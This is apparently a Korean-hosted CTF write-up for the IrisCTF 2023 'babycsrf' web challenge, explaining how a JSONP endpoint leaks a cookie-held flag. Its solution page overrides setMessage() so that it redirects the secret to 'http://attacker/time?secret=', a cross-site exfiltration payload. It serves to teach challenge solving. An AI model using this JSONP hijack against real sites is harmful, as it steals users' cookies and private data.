IrisCTF 2023-web-babycsrf

yoobi·2023년 1월 26일


  • CSRF
  • JSONP vulnerability

Given info

  • and were given
  • and Autobot was given, The bot will execute URL
from flask import Flask, request

app = Flask(__name__)

with open("home.html") as home:

def home():
    return HOME_PAGE

def page():
    secret = request.cookies.get("secret", "EXAMPLEFLAG")
    return f"setMessage('irisctf{{{secret}}}');"
  • The flag's location is autobot's cookies "secret" value
<!DOCTYPE html>
        <h4>Welcome to my home page!</h4>
        Message of the day: <span id="message">(loading...)</span>
window.setMessage = (m) => {
    document.getElementById("message").innerText = m;
window.onload = () => {
    s = document.createElement("script");
    s.src = "/api";
  • setMessage() function will execute set flag value as message


  1. make malicious web script to get FLAG
  2. The FLAG is in's source code, It means we should do CSRF
  •, solve.html were given, we can make malicious service using them.

make malicious solve.html file

  • /api service will make setMessage('irisctf{{{secret}}}');

  • Thus, we gonna change setMessage() function to get FLAG

<!DOCTYPE html>
		function setMessage(m){
			location.href = "http://attacker/time?secret="+m;
	<script src=""></script>
  • The changed setMessage() function will execute location.href including FLAG
  • Then, we can get FLAG

this is yoobi

0개의 댓글